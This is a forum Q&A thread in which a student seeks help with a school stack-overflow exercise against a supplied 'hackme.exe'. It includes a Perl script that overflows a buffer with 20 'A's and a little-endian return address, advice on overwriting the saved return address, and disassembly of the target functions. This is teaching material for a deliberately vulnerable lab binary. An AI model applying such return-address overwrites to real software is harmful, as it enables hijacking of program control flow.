Link to home
Start Free TrialLog in
Avatar of darence
darence

asked on

C++ : Change Stack Address

Hi!
I have doing a school project.. Stack Overrun.

I have a address of: 00401D00

I managed to find the last pointer.
Now i intend to write the pointer to the address.
Any idea?

My lecture notes somehow using perl..
converted "\x28\x13\x40" to an address: 401328

Please advice.
Cheers!
Darence
Avatar of rajeev_devin
rajeev_devin

what are you exactly trying to do ?
you have to use assembly language to achieve the result and it is not recommended to do so except in very very rare cases. eg exception handling where the language does not provide support for it. another is code related to powering on and off. another one is inside a debugger. and you have to be ***extremely*** careful of what you are doing because the return address of/to the caller code is stored on the stack. even main() gets called from somewhere else. i hope that is enough of a warning/discouragement to avoid the usage. anyways here is one way to do it. it is in MSVC environment and for x86 based processors.
void foo() {
  // some code
  int my_esp = 0x00401328; // assuming short is 16 bits
  __asm mov esp, tmp_esp;
  return;
}
Avatar of darence

ASKER

I am trying to get the find the return address, change the address to some place.
In this case, its 00401D00.

I managed to find the return address, except how to point it to 00401D00.
Think need to find the assembly language to point to 00401D00.
Sorry, I misunderstood the question.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. First thing that you would need to do is find where the ret addr for current function is stored, i.e. the location on stack which stores IP where we would go after exiting current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location. free up any dynamic memory that you need to. and return.
Avatar of darence

ASKER

Dear jhshukla..
How can i "store" 0x00401D00 into it?

Is it just AAAAAAAAA."0x00401D00"?
Darence, what processor architecture are you coding for?
Let's say you determine that return address for current function is 0x01234567. How did you figure it out? what memory location did you read to get the information? let's call (i.e. name) that memory location 'ret_addr_loc'. now what you do is overwrite the 32bit value (0x01234567) at that location with the new value (0x00401D00).

for x86 based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
depending on what compiler you are using the ways to incorporate assembly code into C++ code will differ. look up the documentation for your compiler.
Avatar of darence

ASKER

I am using DEV-C++
Output is a .exe file.
From my sample assignment,
To get the address: 401328.
they use: "\x28\x13\x40"

Please advice.
Cheers!
Darence
can you post the code snippet?

The machine you are using is little-endian. see http://en.wikipedia.org/wiki/Endianness for details. basically, in the group of four bytes the least significant byte is stored first, then the next significant and so on. e.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary it is stored as 01010111 00100011 i.e. 0x57 0x23 in memory. So, your string when interpreted as int becomes 0x401328. now recall the fact that C-style strings are null terminated. that adds a zero at the end making a total of 4 bytes, x28 x13 x40 x00. this becomes 0x00401328 when interpreted as an integer.
Avatar of darence

ASKER

http://www.mediamax.com/darenceang/Hosted/hackme.rar

I am given this EXE file.
Main thing is using a perl file to invoke the illegal BAR function..
Upon executing, the BAR address will be shown.
I am supposed to find the numbers of A ( being 41 ) before it goes to the return function.

I calculated it to be 20 A.. but now i do not know how to make the program GO to the bar address.

The syntax of using it is : hackme 3219914 AAAAAAAAAAblah blah blah..

If you manage to "change" the return address to BAR.
You should get a MSG saying I HAVE BEEN HACKED.

Cheers!
Darence
Avatar of darence

ASKER

This is a sample of the perl file i am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x50\x1E\x40";
$cmd = "hackme ".$arg;
system($cmd);

It seems that IF i use this "\x50\x1E\x40";
I am able to get into a BAR4 FUNCTION..
Which should not be the case as i should be getting into a BAR function..
you should be getting inside bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required. just unzip ALL files into one directory & run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n"
Avatar of darence

ASKER

Ok..
I found it..
So what can i do?
This program is supposed to GET INTO bar0 function.
But IF i knoe the address, how am i going to "translate" that into whatever language is x50\x1E\x40.... :)
ASKER CERTIFIED SOLUTION
Avatar of jhshukla
jhshukla
Flag of United States of America image

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
bar0:
hackme.exe Section .text (0x00401000)
0x401C90: 55                     PUSH        EBP                ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5                   MOV         EBP,ESP            
0x401C93: 83EC08                 SUB         ESP,0x8            
0x401C96: 83C4F8                 ADD         ESP,0xF8          
0x401C99: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8                 ADD         ESP,0xF8           ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000             PUSH        0x401C63           ; .text:Inside bar0 function. |
0x401CA6: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CAB: E8FC1E0000             CALL        0x403BAC          
0x401CB0: 83C410                 ADD         ESP,0x10          
0x401CB3: 89C0                   MOV         EAX,EAX            
0x401CB5: 50                     PUSH        EAX                
0x401CB6: E8B5F90000             CALL        0x411670          
0x401CBB: 83C410                 ADD         ESP,0x10          
0x401CBE: 83C4F8                 ADD         ESP,0xF8          
0x401CC1: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8                 ADD         ESP,0xF8          
0x401CC9: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401CCE: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CD3: E8D41E0000             CALL        0x403BAC          
0x401CD8: 83C410                 ADD         ESP,0x10          
0x401CDB: 89C0                   MOV         EAX,EAX            
0x401CDD: 50                     PUSH        EAX                
0x401CDE: E88DF90000             CALL        0x411670          
0x401CE3: 83C410                 ADD         ESP,0x10          
0x401CE6: C9                     LEAVE                          
0x401CE7: C3                     RET                            

bar4:
hackme.exe Section .text (0x00401000)
0x401E50: 55                     PUSH        EBP                ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5                   MOV         EBP,ESP            
0x401E53: 83EC08                 SUB         ESP,0x8            
0x401E56: 83C4F8                 ADD         ESP,0xF8          
0x401E59: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8                 ADD         ESP,0xF8          
0x401E61: 68381E4000             PUSH        0x401E38           ; .text:Inside bar4 function. |
0x401E66: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E6B: E83C1D0000             CALL        0x403BAC          
0x401E70: 83C410                 ADD         ESP,0x10          
0x401E73: 89C0                   MOV         EAX,EAX            
0x401E75: 50                     PUSH        EAX                
0x401E76: E8F5F70000             CALL        0x411670          
0x401E7B: 83C410                 ADD         ESP,0x10          
0x401E7E: 83C4F8                 ADD         ESP,0xF8          
0x401E81: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8                 ADD         ESP,0xF8          
0x401E89: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401E8E: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E93: E8141D0000             CALL        0x403BAC          
0x401E98: 83C410                 ADD         ESP,0x10          
0x401E9B: 89C0                   MOV         EAX,EAX            
0x401E9D: 50                     PUSH        EAX                
0x401E9E: E8CDF70000             CALL        0x411670          
0x401EA3: 83C410                 ADD         ESP,0x10          
0x401EA6: C9                     LEAVE                          
0x401EA7: C3                     RET                            
btw, i just figured that 0x00401D00 is bar1. are you, by any chance, trying to return to bar1 from bar0?